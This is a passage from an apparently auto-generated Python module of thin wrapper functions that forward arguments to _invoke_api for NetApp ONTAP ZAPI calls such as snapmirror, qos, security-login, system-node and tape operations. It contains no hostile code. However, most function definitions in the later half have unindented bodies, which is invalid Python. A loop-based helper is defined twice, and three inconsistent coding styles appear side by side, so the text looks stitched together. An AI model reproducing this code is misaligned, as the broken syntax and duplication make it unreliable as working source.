    return _invoke_api('ntdtest-iternoread-get-iter-alt', *args)
def ntdtest_iternoread_list_info(*args):
    return _invoke_api('ntdtest-iternoread-list-info', *args)
def ntdtest_iternoread_modify(*args):
    return _invoke_api('ntdtest-iternoread-modify', *args)
def ntdtest_iternoread_modify_iter(*args):
    return _invoke_api('ntdtest-iternoread-modify-iter', *args)
def ntdtest_iterwants_get(*args):
    return _invoke_api('ntdtest-iterwants-get', *args)
def ntdtest_iterwants_get_iter(*args):
    return _invoke_api('ntdtest-iterwants-get-iter', *args)
def ntdtest_list_non_test_action_default(*args):
    return _invoke_api('ntdtest-list-non-test-action-default', *args)
def ntdtest_list_non_test_method_default(*args):
    return _invoke_api('ntdtest-list-non-test-method-default', *args)
def ntdtest_method_only_default(*args):
    return _invoke_api('ntdtest-method-only-default', *args)
def ntdtest_method_only_method2(*args):
    return _invoke_api('ntdtest-method-only-method2', *args)
def ntdtest_method_only_method3(*args):
    return _invoke_api('ntdtest-method-only-method3', *args)
def ntdtest_method_only_method3_a(*args):
    return _invoke_api('ntdtest-method-only-method3-a', *args)
def ntdtest_method_only_method3_async(*args):
    return _invoke_api('ntdtest-method-only-method3-async', *args)
def ntdtest_method_only_method3_async_a(*args):
    return _invoke_api('ntdtest-method-only-method3-async-a', *args)
def ntdtest_method_only_method3_async_iter(*args):
    return _invoke_api('ntdtest-method-only-method3-async-iter', *args)
def ntdtest_method_only_method3_iter(*args):
    return _invoke_api('ntdtest-method-only-method3-iter', *args)
def ntdtest_multiple_array_get_deep_element(*args):
    return _invoke_api('ntdtest-multiple-array-get-deep-element', *args)
def ntdtest_multiple_array_get_shallow_element(*args):
    return _invoke_api('ntdtest-multiple-array-get-shallow-element', *args)
def ntdtest_multiple_arrays_get_iter(*args):
    return _invoke_api('ntdtest-multiple-arrays-get-iter', *args)
def ntdtest_multiple_default_method1_alternate(*args):
    return _invoke_api('ntdtest-multiple-default-method1-alternate', *args)
def ntdtest_multiple_default_method1_default(*args):
    return _invoke_api('ntdtest-multiple-default-method1-default', *args)
def ntdtest_multiple_inout_method1_alternate(*args):
    return _invoke_api('ntdtest-multiple-inout-method1-alternate', *args)
def ntdtest_multiple_inout_method1_default(*args):
    return _invoke_api('ntdtest-multiple-inout-method1-default', *args)
def ntdtest_multiple_with_default_create(*args):
    return _invoke_api('ntdtest-multiple-with-default-create', *args)
def ntdtest_multiple_with_inout_create(*args):
    return _invoke_api('ntdtest-multiple-with-inout-create', *args)
def ntdtest_nonlist_get(*args):
    return _invoke_api('ntdtest-nonlist-get', *args)
def ntdtest_nonlist_get_iter(*args):
    return _invoke_api('ntdtest-nonlist-get-iter', *args)
def ntdtest_shownoread_default_get(*args):
    return _invoke_api('ntdtest-shownoread-default-get', *args)
def ntdtest_shownoread_get(*args):
    return _invoke_api('ntdtest-shownoread-get', *args)
def ntdtest_top_level_alt_create(*args):
    return _invoke_api('ntdtest-top-level-alt-create', *args)
def ntdtest_top_level_alt_get(*args):
    return _invoke_api('ntdtest-top-level-alt-get', *args)
def ntdtest_top_level_default_create(*args):
    return _invoke_api('ntdtest-top-level-default-create', *args)
def ntdtest_top_level_default_destroy(*args):
api_call = _invoke_api('ntdtest-top-level-default-destroy', *args)
return api_call
def ntdtest_top_level_default_get(*args):
api_call = _invoke_api('ntdtest-top-level-default-get', *args)
return api_call
def ntdtest_top_level_default_modify(*args):
api_call = _invoke_api('ntdtest-top-level-default-modify', *args)
return api_call
def ntdtest_top_level_no_inputs_create(*args):
api_call = _invoke_api('ntdtest-top-level-no-inputs-create', *args)
return api_call
def ntdtest_view_alternate_create_1(*args):
api_call = _invoke_api('ntdtest-view-alternate-create-1', *args)
return api_call
def ntdtest_view_alternate_create_2(*args):
api_call = _invoke_api('ntdtest-view-alternate-create-2', *args)
return api_call
def ntdtest_view_alternate_destroy_1(*args):
api_call = _invoke_api('ntdtest-view-alternate-destroy-1', *args)
return api_call
def ntdtest_view_alternate_get_1(*args):
api_call = _invoke_api('ntdtest-view-alternate-get-1', *args)
return api_call
def ntdtest_view_alternate_get_2(*args):
api_call = _invoke_api('ntdtest-view-alternate-get-2', *args)
return api_call
def ntdtest_view_alternate_modify_1(*args):
api_call = _invoke_api('ntdtest-view-alternate-modify-1', *args)
return api_call
def ntdtest_view_default_create(*args):
api_call = _invoke_api('ntdtest-view-default-create', *args)
return api_call
def ntdtest_view_default_destroy(*args):
api_call = _invoke_api('ntdtest-view-default-destroy', *args)
return api_call
def ntdtest_view_default_get(*args):
api_call = _invoke_api('ntdtest-view-default-get', *args)
return api_call
def ntdtest_view_default_modify(*args):
api_call = _invoke_api('ntdtest-view-default-modify', *args)
return api_call
def ntdtest_view_destroy_iter(*args):
api_call = _invoke_api('ntdtest-view-destroy-iter', *args)
return api_call
def ntdtest_view_get_iter(*args):
api_call = _invoke_api('ntdtest-view-get-iter', *args)
return api_call
def ntdtest_view_modify_iter(*args):
api_call = _invoke_api('ntdtest-view-modify-iter', *args)
return api_call
# Thin auto-generated wrappers for the ntp/options/perf/portset/qos/qtree/
# quota/raidgroup/security ONTAP ZAPI calls.  Each wrapper forwards its
# positional arguments unchanged to _invoke_api with the hyphenated API name;
# the module-level function name is the API name with '-' replaced by '_'.

def _make_api_wrapper(api_name):
    """Build a forwarding wrapper for the given hyphenated ZAPI name."""
    def _wrapper(*args):
        return _invoke_api(api_name, *args)
    # Keep tracebacks/introspection readable by naming the wrapper as a
    # hand-written def would have been named.
    _wrapper.__name__ = api_name.replace('-', '_')
    return _wrapper

for _api_name in (
    'ntp-server-create',
    'ntp-server-delete',
    'ntp-server-get',
    'ntp-server-get-iter',
    'ntp-server-modify',
    'ntp-server-reset',
    'ntp-server-validate',
    'options-get-iter',
    'options-modify-iter',
    'perf-archive-config-get',
    'perf-archive-config-modify',
    'perf-archive-create',
    'perf-archive-datastore-get-iter',
    'perf-archive-destroy',
    'perf-archive-get-iter',
    'perf-archive-modify',
    'perf-object-counter-list-info',
    'perf-object-get-instances',
    'perf-object-instance-list-info-iter',
    'perf-object-list-info',
    'perf-preset-create',
    'perf-preset-delete',
    'perf-preset-detail-get',
    'perf-preset-get-iter',
    'perf-preset-import',
    'perf-preset-modify',
    'portset-get-iter',
    'qos-policy-group-create',
    'qos-policy-group-delete',
    'qos-policy-group-delete-iter',
    'qos-policy-group-get',
    'qos-policy-group-get-iter',
    'qos-policy-group-modify',
    'qos-policy-group-modify-iter',
    'qos-policy-group-rename',
    'qos-settings-control-get',
    'qos-settings-control-modify',
    'qos-settings-read-ahead-create',
    'qos-settings-read-ahead-destroy',
    'qos-settings-read-ahead-destroy-iter',
    'qos-settings-read-ahead-get',
    'qos-settings-read-ahead-get-iter',
    'qos-settings-read-ahead-modify',
    'qos-settings-read-ahead-modify-iter',
    'qos-test-smf-zapi-error',
    'qos-workload-delete',
    'qos-workload-delete-iter',
    'qos-workload-get',
    'qos-workload-get-iter',
    'qos-workload-modify',
    'qos-workload-modify-iter',
    'qtree-list-iter',
    'quota-list-entries-iter',
    'quota-policy-copy',
    'quota-policy-create',
    'quota-policy-delete-iter',
    'quota-policy-get-iter',
    'quota-policy-rename',
    'quota-policy-rule-count-get-iter',
    'quota-report-iter',
    'quota-status-iter',
    'raidgroup-get-iter',
    'security-certificate-ca-issued-get-iter',
    'security-certificate-create',
    'security-certificate-delete',
    'security-certificate-delete-iter',
    'security-certificate-file-get-iter',
    'security-certificate-generate-csr',
    'security-certificate-get-iter',
    'security-certificate-install',
    'security-certificate-revoke',
    'security-certificate-sign',
    'security-key-manager-add-iter',
    'security-key-manager-create-key',
    'security-key-manager-delete-iter',
    'security-key-manager-get',
    'security-key-manager-get-iter',
    'security-key-manager-query-get',
    'security-key-manager-query-get-iter',
    'security-key-manager-restore-get',
    'security-key-manager-restore-get-iter',
    'security-key-manager-setup',
    'security-login-create',
    'security-login-delete',
    'security-login-delete-iter',
    'security-login-get',
    'security-login-get-iter',
    'security-login-lock',
    'security-login-modify',
    'security-login-modify-iter',
    'security-login-modify-password',
    'security-login-role-config-get',
    'security-login-role-config-get-iter',
    'security-login-role-config-modify',
    'security-login-role-config-modify-iter',
    'security-login-role-create',
    'security-login-role-delete',
    'security-login-role-delete-iter',
    'security-login-role-get',
    'security-login-role-get-iter',
    'security-login-role-modify',
    'security-login-role-modify-iter',
    'security-login-unlock',
    'security-reset',
    'security-ssh-add',
    'security-ssh-get-iter',
    'security-ssh-remove',
    'security-ssl-get-iter',
    'security-ssl-modify',
    'security-trace-filter-get-iter',
    'security-trace-result-show',
):
    globals()[_api_name.replace('-', '_')] = _make_api_wrapper(_api_name)
# Thin auto-generated wrappers for the service-processor/sis/snapmirror/
# snapshot/snmp/ssh/storage ONTAP ZAPI calls.  Each wrapper forwards its
# positional arguments unchanged to _invoke_api with the hyphenated API name;
# the module-level function name is the API name with '-' replaced by '_'.

def _make_api_wrapper(api_name):
    """Build a forwarding wrapper for the given hyphenated ZAPI name."""
    def _wrapper(*args):
        return _invoke_api(api_name, *args)
    # Keep tracebacks/introspection readable by naming the wrapper as a
    # hand-written def would have been named.
    _wrapper.__name__ = api_name.replace('-', '_')
    return _wrapper

for _api_name in (
    'service-processor-api-service-get',
    'service-processor-api-service-modify',
    'service-processor-api-service-renew-certificates',
    'service-processor-asup-config-get',
    'service-processor-asup-config-set',
    'service-processor-asup-invoke',
    'service-processor-auto-configuration-disable',
    'service-processor-auto-configuration-enable',
    'service-processor-auto-configuration-get',
    'service-processor-get',
    'service-processor-get-iter',
    'service-processor-image-get',
    'service-processor-image-modify',
    'service-processor-image-update',
    'service-processor-image-update-progress-get',
    'service-processor-log-allocation-get',
    'service-processor-log-allocation-get-iter',
    'service-processor-network-get',
    'service-processor-network-get-iter',
    'service-processor-network-modify',
    'service-processor-network-modify-iter',
    'service-processor-reboot',
    'service-processor-ssh-add-allowed-addresses',
    'service-processor-ssh-get',
    'service-processor-ssh-remove-allowed-addresses',
    'sis-get-iter',
    'sis-policy-get-iter',
    'sis-prepare-to-downgrade',
    'sis-status',
    'snapmirror-abort',
    'snapmirror-abort-async',
    'snapmirror-abort-iter',
    'snapmirror-break',
    'snapmirror-break-async',
    'snapmirror-break-iter',
    'snapmirror-cache-rebuild-relationship',
    'snapmirror-check',
    'snapmirror-check-iter',
    'snapmirror-config-replication-cluster-storage-configuration-get',
    'snapmirror-config-replication-cluster-storage-configuration-modify',
    'snapmirror-cr-status-aggregate-eligibility-get',
    'snapmirror-cr-status-aggregate-eligibility-get-iter',
    'snapmirror-cr-status-comm-get',
    'snapmirror-cr-status-comm-get-iter',
    'snapmirror-cr-status-get',
    'snapmirror-create',
    'snapmirror-destroy',
    'snapmirror-destroy-async',
    'snapmirror-destroy-iter',
    'snapmirror-get',
    'snapmirror-get-destination',
    'snapmirror-get-destination-iter',
    'snapmirror-get-iter',
    'snapmirror-get-total-records',
    'snapmirror-get-volume-status',
    'snapmirror-history-get',
    'snapmirror-history-get-iter',
    'snapmirror-initialize',
    'snapmirror-initialize-iter',
    'snapmirror-initialize-ls-set',
    'snapmirror-modify',
    'snapmirror-modify-iter',
    'snapmirror-policy-get-iter',
    'snapmirror-promote',
    'snapmirror-promote-iter',
    'snapmirror-quiesce',
    'snapmirror-quiesce-iter',
    'snapmirror-release',
    'snapmirror-release-iter',
    'snapmirror-restore',
    'snapmirror-resume',
    'snapmirror-resume-iter',
    'snapmirror-resync',
    'snapmirror-resync-iter',
    'snapmirror-snapshot-owner-get',
    'snapmirror-snapshot-owner-get-snapshots',
    'snapmirror-update',
    'snapmirror-update-iter',
    'snapmirror-update-ls-set',
    'snapshot-get-iter',
    'snapshot-modify-iter',
    'snapshot-policy-add-schedule',
    'snapshot-policy-create',
    'snapshot-policy-delete',
    'snapshot-policy-get',
    'snapshot-policy-get-iter',
    'snapshot-policy-modify',
    'snapshot-policy-modify-schedule',
    'snapshot-policy-remove-schedule',
    'snapshot-reserve-list-info',
    'snmp-community-add',
    'snmp-community-delete',
    'snmp-community-delete-all',
    'snmp-disable',
    'snmp-enable',
    'snmp-get',
    'snmp-get-next',
    'snmp-prepare-to-downgrade',
    'snmp-status',
    'snmp-trap-disable',
    'snmp-trap-enable',
    'snmp-traphost-add',
    'snmp-traphost-delete',
    'ssh-prepare-to-downgrade',
    'storage-adapter-enable-adapter',
    'storage-adapter-get-adapter-info',
    'storage-adapter-get-adapter-list',
    'storage-array-get-config-summary',
    'storage-array-list-info',
    'storage-array-modify',
    'storage-array-port-modify',
    'storage-array-ports-list-info',
    'storage-array-rename',
    'storage-bridge-get',
    'storage-bridge-get-iter',
    'storage-disk-get-iter',
    'storage-disk-modify',
    'storage-disk-remove-reservation',
    'storage-initiator-balance',
    'storage-initiator-disk-path-list-info',
    'storage-initiator-errors-list-info',
    'storage-initiator-get-load',
    'storage-initiator-path-list-info',
    'storage-initiator-path-quiesce',
    'storage-initiator-path-resume',
    'storage-pool-add',
    'storage-pool-aggregate-get-iter',
    'storage-pool-available-capacity-get-iter',
    'storage-pool-create',
    'storage-pool-delete',
    'storage-pool-disk-get-iter',
    'storage-pool-get-iter',
    'storage-pool-reassign',
    'storage-shelf-acp-get',
    'storage-shelf-acp-module-get',
    'storage-shelf-acp-module-get-iter',
    'storage-shelf-bay-list-info',
    'storage-shelf-environment-list-info',
    'storage-shelf-error-list-info',
    'storage-shelf-firmware-update',
    'storage-shelf-firmware-update-info-get',
    'storage-shelf-firmware-update-info-get-iter',
    'storage-shelf-get-shelf-info',
    'storage-shelf-info-get',
    'storage-shelf-info-get-iter',
    'storage-shelf-list-info',
    'storage-shelf-storage-acp-configure',
    'storage-switch-get',
    'storage-switch-get-iter',
    'storage-transition-aggregates-get-iter',
    'storage-transition-aggregates-start',
    'storage-transition-commit-get-iter',
):
    globals()[_api_name.replace('-', '_')] = _make_api_wrapper(_api_name)
def storage_transition_commit_start(*args):
api_call = _invoke_api('storage-transition-commit-start', *args)
return api_call
def storage_transition_pre_commit_begin(*args):
api_call = _invoke_api('storage-transition-pre-commit-begin', *args)
return api_call
def storage_transition_pre_commit_end(*args):
api_call = _invoke_api('storage-transition-pre-commit-end', *args)
return api_call
def storage_transition_pre_commit_get(*args):
api_call = _invoke_api('storage-transition-pre-commit-get', *args)
return api_call
def storage_transition_pre_commit_get_iter(*args):
api_call = _invoke_api('storage-transition-pre-commit-get-iter', *args)
return api_call
def storage_transition_purge_info(*args):
api_call = _invoke_api('storage-transition-purge-info', *args)
return api_call
def storage_transition_revert_get_iter(*args):
api_call = _invoke_api('storage-transition-revert-get-iter', *args)
return api_call
def storage_transition_revert_start(*args):
api_call = _invoke_api('storage-transition-revert-start', *args)
return api_call
def storage_transition_volumes_get_iter(*args):
api_call = _invoke_api('storage-transition-volumes-get-iter', *args)
return api_call
def storage_transition_volumes_start(*args):
api_call = _invoke_api('storage-transition-volumes-start', *args)
return api_call
def system_api_change_get_iter(*args):
api_call = _invoke_api('system-api-change-get-iter', *args)
return api_call
def system_api_get_elements(*args):
api_call = _invoke_api('system-api-get-elements', *args)
return api_call
def system_api_list(*args):
api_call = _invoke_api('system-api-list', *args)
return api_call
def system_api_list_types(*args):
api_call = _invoke_api('system-api-list-types', *args)
return api_call
def system_cli(*args):
api_call = _invoke_api('system-cli', *args)
return api_call
def system_get_node_info_iter(*args):
api_call = _invoke_api('system-get-node-info-iter', *args)
return api_call
def system_get_ontapi_version(*args):
api_call = _invoke_api('system-get-ontapi-version', *args)
return api_call
def system_get_vendor_info(*args):
api_call = _invoke_api('system-get-vendor-info', *args)
return api_call
def system_get_version(*args):
    """Invoke the 'system-get-version' ONTAP API and return the result element."""
    return _invoke_api('system-get-version', *args)
def system_image_fetch_package(*args):
api_call = _invoke_api('system-image-fetch-package', *args)
return api_call
def system_image_get_iter(*args):
api_call = _invoke_api('system-image-get-iter', *args)
return api_call
def system_image_modify(*args):
api_call = _invoke_api('system-image-modify', *args)
return api_call
def system_image_package_delete(*args):
api_call = _invoke_api('system-image-package-delete', *args)
return api_call
def system_image_package_get_iter(*args):
api_call = _invoke_api('system-image-package-get-iter', *args)
return api_call
def system_image_update(*args):
api_call = _invoke_api('system-image-update', *args)
return api_call
def system_image_update_get_abort(*args):
api_call = _invoke_api('system-image-update-get-abort', *args)
return api_call
def system_image_update_progress_get(*args):
api_call = _invoke_api('system-image-update-progress-get', *args)
return api_call
def system_manager_upgrade(*args):
api_call = _invoke_api('system-manager-upgrade', *args)
return api_call
def system_node_delete_backlog_get(*args):
api_call = _invoke_api('system-node-delete-backlog-get', *args)
return api_call
def system_node_discovery_get_iter(*args):
api_call = _invoke_api('system-node-discovery-get-iter', *args)
return api_call
def system_node_get(*args):
api_call = _invoke_api('system-node-get', *args)
return api_call
def system_node_get_iter(*args):
api_call = _invoke_api('system-node-get-iter', *args)
return api_call
def system_node_modify(*args):
api_call = _invoke_api('system-node-modify', *args)
return api_call
def system_node_power_cycle(*args):
api_call = _invoke_api('system-node-power-cycle', *args)
return api_call
def system_node_power_get(*args):
api_call = _invoke_api('system-node-power-get', *args)
return api_call
def system_node_power_off(*args):
api_call = _invoke_api('system-node-power-off', *args)
return api_call
def system_node_power_on(*args):
api_call = _invoke_api('system-node-power-on', *args)
return api_call
def system_node_reboot(*args):
api_call = _invoke_api('system-node-reboot', *args)
return api_call
def system_node_rename(*args):
api_call = _invoke_api('system-node-rename', *args)
return api_call
def system_node_reset(*args):
api_call = _invoke_api('system-node-reset', *args)
return api_call
def system_node_revert_to(*args):
api_call = _invoke_api('system-node-revert-to', *args)
return api_call
def system_node_shutdown(*args):
api_call = _invoke_api('system-node-shutdown', *args)
return api_call
def system_ontapi_limits_get(*args):
api_call = _invoke_api('system-ontapi-limits-get', *args)
return api_call
def system_ontapi_limits_set(*args):
api_call = _invoke_api('system-ontapi-limits-set', *args)
return api_call
def system_services_web_get(*args):
api_call = _invoke_api('system-services-web-get', *args)
return api_call
def system_user_capability_get_iter(*args):
api_call = _invoke_api('system-user-capability-get-iter', *args)
return api_call
def tape_mc_get(*args):
api_call = _invoke_api('tape-mc-get', *args)
return api_call
def tape_mc_get_iter(*args):
api_call = _invoke_api('tape-mc-get-iter', *args)
return api_call
def tape_mc_info_alias_clear(*args):
api_call = _invoke_api('tape-mc-info-alias-clear', *args)
return api_call
def tape_mc_info_alias_set(*args):
api_call = _invoke_api('tape-mc-info-alias-set', *args)
return api_call
def tape_mc_info_offline(*args):
api_call = _invoke_api('tape-mc-info-offline', *args)
return api_call
def tape_mc_info_online(*args):
api_call = _invoke_api('tape-mc-info-online', *args)
return api_call
def tape_mc_info_position(*args):
api_call = _invoke_api('tape-mc-info-position', *args)
return api_call
def tape_mc_info_reset(*args):
api_call = _invoke_api('tape-mc-info-reset', *args)
return api_call
def tape_mc_info_test_release(*args):
api_call = _invoke_api('tape-mc-info-test-release', *args)
return api_call
def tape_mc_info_test_reserve(*args):
api_call = _invoke_api('tape-mc-info-test-reserve', *args)
return api_call
def tape_mc_info_trace(*args):
api_call = _invoke_api('tape-mc-info-trace', *args)
return api_call
def test_intrinsic_apis_1_create(*args):
api_call = _invoke_api('test-intrinsic-apis-1-create', *args)
return api_call
def test_intrinsic_apis_1_destroy(*args):
api_call = _invoke_api('test-intrinsic-apis-1-destroy', *args)
return api_call
def test_intrinsic_apis_1_destroy_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-1-destroy-iter', *args)
return api_call
def test_intrinsic_apis_1_get(*args):
api_call = _invoke_api('test-intrinsic-apis-1-get', *args)
return api_call
def test_intrinsic_apis_1_get_create_defaults(*args):
api_call = _invoke_api('test-intrinsic-apis-1-get-create-defaults', *args)
return api_call
def test_intrinsic_apis_1_get_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-1-get-iter', *args)
return api_call
def test_intrinsic_apis_1_get_total_records(*args):
api_call = _invoke_api('test-intrinsic-apis-1-get-total-records', *args)
return api_call
def test_intrinsic_apis_1_list_info(*args):
api_call = _invoke_api('test-intrinsic-apis-1-list-info', *args)
return api_call
def test_intrinsic_apis_2_create(*args):
api_call = _invoke_api('test-intrinsic-apis-2-create', *args)
return api_call
def test_intrinsic_apis_2_destroy(*args):
api_call = _invoke_api('test-intrinsic-apis-2-destroy', *args)
return api_call
def test_intrinsic_apis_2_destroy_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-2-destroy-iter', *args)
return api_call
def test_intrinsic_apis_2_get(*args):
api_call = _invoke_api('test-intrinsic-apis-2-get', *args)
return api_call
def test_intrinsic_apis_2_get_create_defaults(*args):
api_call = _invoke_api('test-intrinsic-apis-2-get-create-defaults', *args)
return api_call
def test_intrinsic_apis_2_get_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-2-get-iter', *args)
return api_call
def test_intrinsic_apis_2_get_total_records(*args):
api_call = _invoke_api('test-intrinsic-apis-2-get-total-records', *args)
return api_call
def test_intrinsic_apis_2_list_info(*args):
api_call = _invoke_api('test-intrinsic-apis-2-list-info', *args)
return api_call
def test_intrinsic_apis_2_modify(*args):
api_call = _invoke_api('test-intrinsic-apis-2-modify', *args)
return api_call
def test_intrinsic_apis_2_modify_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-2-modify-iter', *args)
return api_call
def test_intrinsic_apis_3_create(*args):
api_call = _invoke_api('test-intrinsic-apis-3-create', *args)
return api_call
def test_intrinsic_apis_3_destroy(*args):
api_call = _invoke_api('test-intrinsic-apis-3-destroy', *args)
return api_call
def test_intrinsic_apis_3_destroy_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-3-destroy-iter', *args)
return api_call
def test_intrinsic_apis_3_get(*args):
api_call = _invoke_api('test-intrinsic-apis-3-get', *args)
return api_call
def test_intrinsic_apis_3_get_create_defaults(*args):
api_call = _invoke_api('test-intrinsic-apis-3-get-create-defaults', *args)
return api_call
def test_intrinsic_apis_3_get_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-3-get-iter', *args)
return api_call
def test_intrinsic_apis_3_get_total_records(*args):
api_call = _invoke_api('test-intrinsic-apis-3-get-total-records', *args)
return api_call
def test_intrinsic_apis_3_list_info(*args):
api_call = _invoke_api('test-intrinsic-apis-3-list-info', *args)
return api_call
def test_intrinsic_apis_4_create(*args):
api_call = _invoke_api('test-intrinsic-apis-4-create', *args)
return api_call
def test_intrinsic_apis_4_destroy(*args):
api_call = _invoke_api('test-intrinsic-apis-4-destroy', *args)
return api_call
def test_intrinsic_apis_4_destroy_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-4-destroy-iter', *args)
return api_call
def test_intrinsic_apis_4_get(*args):
api_call = _invoke_api('test-intrinsic-apis-4-get', *args)
return api_call
def test_intrinsic_apis_4_get_create_defaults(*args):
api_call = _invoke_api('test-intrinsic-apis-4-get-create-defaults', *args)
return api_call
def test_intrinsic_apis_4_get_iter(*args):
api_call = _invoke_api('test-intrinsic-apis-4-get-iter', *args)
return api_call
def test_intrinsic_apis_4_get_total_records(*args):
api_call = _invoke_api('test-intrinsic-apis-4-get-total-records', *args)
return api_call
def test_intrinsic_apis_4_list_info(*args):
api_call = _invoke_api('test-intrinsic-apis-4-list-info', *args)
return api_call
def test_key_optionality_alt_create(*args):
api_call = _invoke_api('test-key-optionality-alt-create', *args)
return api_call
def test_key_optionality_alt_destroy(*args):
api_call = _invoke_api('test-key-optionality-alt-destroy', *args)
return api_call
def test_key_optionality_alt_get(*args):
api_call = _invoke_api('test-key-optionality-alt-get', *args)
return api_call
def test_key_optionality_alt_modify(*args):
api_call = _invoke_api('test-key-optionality-alt-modify', *args)
return api_call
def test_key_optionality_create(*args):
api_call = _invoke_api('test-key-optionality-create', *args)
return api_call
def test_key_optionality_destroy(*args):
api_call = _invoke_api('test-key-optionality-destroy', *args)
return api_call
def test_key_optionality_get(*args):
api_call = _invoke_api('test-key-optionality-get', *args)
return api_call
def test_key_optionality_modify(*args):
api_call = _invoke_api('test-key-optionality-modify', *args)
return api_call
def test_memory_stats(*args):
api_call = _invoke_api('test-memory-stats', *args)
return api_call
def test_password_get(*args):
api_call = _invoke_api('test-password-get', *args)
return api_call
def test_password_set(*args):
api_call = _invoke_api('test-password-set', *args)
return api_call
def test_plug_leak(*args):
api_call = _invoke_api('test-plug-leak', *args)
return api_call
def test_ro_action_1_readonly3(*args):
api_call = _invoke_api('test-ro-action-1-readonly3', *args)
return api_call
def test_ro_action_2_readonly4(*args):
api_call = _invoke_api('test-ro-action-2-readonly4', *args)
return api_call
def test_ro_action_3_writable3(*args):
api_call = _invoke_api('test-ro-action-3-writable3', *args)
return api_call
def test_ro_method_readonly1(*args):
api_call = _invoke_api('test-ro-method-readonly1', *args)
return api_call
def test_ro_table_readonly1(*args):
api_call = _invoke_api('test-ro-table-readonly1', *args)
return api_call
def test_ro_table_writable1(*args):
api_call = _invoke_api('test-ro-table-writable1', *args)
return api_call
def test_rw_method_writable2(*args):
api_call = _invoke_api('test-rw-method-writable2', *args)
return api_call
def test_schema_validator(*args):
api_call = _invoke_api('test-schema-validator', *args)
return api_call
def test_zapi_ro_view_1_readonly6(*args):
api_call = _invoke_api('test-zapi-ro-view-1-readonly6', *args)
return api_call
def test_zapi_ro_view_1_writable4(*args):
api_call = _invoke_api('test-zapi-ro-view-1-writable4', *args)
return api_call
def test_zapi_ro_view_5_create(*args):
api_call = _invoke_api('test-zapi-ro-view-5-create', *args)
return api_call
def test_zapi_ro_view_5_destroy(*args):
api_call = _invoke_api('test-zapi-ro-view-5-destroy', *args)
return api_call
def test_zapi_ro_view_5_destroy_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-5-destroy-iter', *args)
return api_call
def test_zapi_ro_view_5_get(*args):
api_call = _invoke_api('test-zapi-ro-view-5-get', *args)
return api_call
def test_zapi_ro_view_5_get_create_defaults(*args):
api_call = _invoke_api('test-zapi-ro-view-5-get-create-defaults', *args)
return api_call
def test_zapi_ro_view_5_get_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-5-get-iter', *args)
return api_call
def test_zapi_ro_view_5_get_total_records(*args):
api_call = _invoke_api('test-zapi-ro-view-5-get-total-records', *args)
return api_call
def test_zapi_ro_view_5_list_info(*args):
api_call = _invoke_api('test-zapi-ro-view-5-list-info', *args)
return api_call
def test_zapi_ro_view_6_create(*args):
api_call = _invoke_api('test-zapi-ro-view-6-create', *args)
return api_call
def test_zapi_ro_view_6_destroy(*args):
api_call = _invoke_api('test-zapi-ro-view-6-destroy', *args)
return api_call
def test_zapi_ro_view_6_destroy_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-6-destroy-iter', *args)
return api_call
def test_zapi_ro_view_6_get(*args):
api_call = _invoke_api('test-zapi-ro-view-6-get', *args)
return api_call
def test_zapi_ro_view_6_get_create_defaults(*args):
api_call = _invoke_api('test-zapi-ro-view-6-get-create-defaults', *args)
return api_call
def test_zapi_ro_view_6_get_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-6-get-iter', *args)
return api_call
def test_zapi_ro_view_6_get_total_records(*args):
api_call = _invoke_api('test-zapi-ro-view-6-get-total-records', *args)
return api_call
def test_zapi_ro_view_6_list_info(*args):
api_call = _invoke_api('test-zapi-ro-view-6-list-info', *args)
return api_call
def test_zapi_ro_view_6_modify(*args):
api_call = _invoke_api('test-zapi-ro-view-6-modify', *args)
return api_call
def test_zapi_ro_view_6_modify_iter(*args):
api_call = _invoke_api('test-zapi-ro-view-6-modify-iter', *args)
return api_call
def test_zapi_sleep(*args):
api_call = _invoke_api('test-zapi-sleep', *args)
return api_call
def test_zapi_sleep_destroy_async_iter(*args):
api_call = _invoke_api('test-zapi-sleep-destroy-async-iter', *args)
return api_call
def test_zapi_sleep_destroy_iter(*args):
api_call = _invoke_api('test-zapi-sleep-destroy-iter', *args)
return api_call
def test_zapi_sleep_get_iter(*args):
api_call = _invoke_api('test-zapi-sleep-get-iter', *args)
return api_call
def test_zapi_sleep_method_async_iter(*args):
api_call = _invoke_api('test-zapi-sleep-method-async-iter', *args)
return api_call
def test_zapi_sleep_method_iter(*args):
api_call = _invoke_api('test-zapi-sleep-method-iter', *args)
return api_call
def test_zapi_sleep_modify_async_iter(*args):
api_call = _invoke_api('test-zapi-sleep-modify-async-iter', *args)
return api_call
def test_zapi_sleep_modify_iter(*args):
api_call = _invoke_api('test-zapi-sleep-modify-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_async_create(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-create', *args)
return api_call
def test_zapi_smf_mapping_apis_async_destroy(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-destroy', *args)
return api_call
def test_zapi_smf_mapping_apis_async_destroy_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-destroy-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_async_get(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-get', *args)
return api_call
def test_zapi_smf_mapping_apis_async_get_create_defaults(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-get-create-defaults', *args)
return api_call
def test_zapi_smf_mapping_apis_async_get_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-get-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_async_get_total_records(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-get-total-records', *args)
return api_call
def test_zapi_smf_mapping_apis_async_list_info(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-list-info', *args)
return api_call
def test_zapi_smf_mapping_apis_async_modify(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-modify', *args)
return api_call
def test_zapi_smf_mapping_apis_async_modify_iter(*args):
api_call = _invoke_api('test-zapi-smf-mapping-apis-async-modify-iter', *args)
return api_call
def test_zapi_smf_mapping_apis_create(*args):
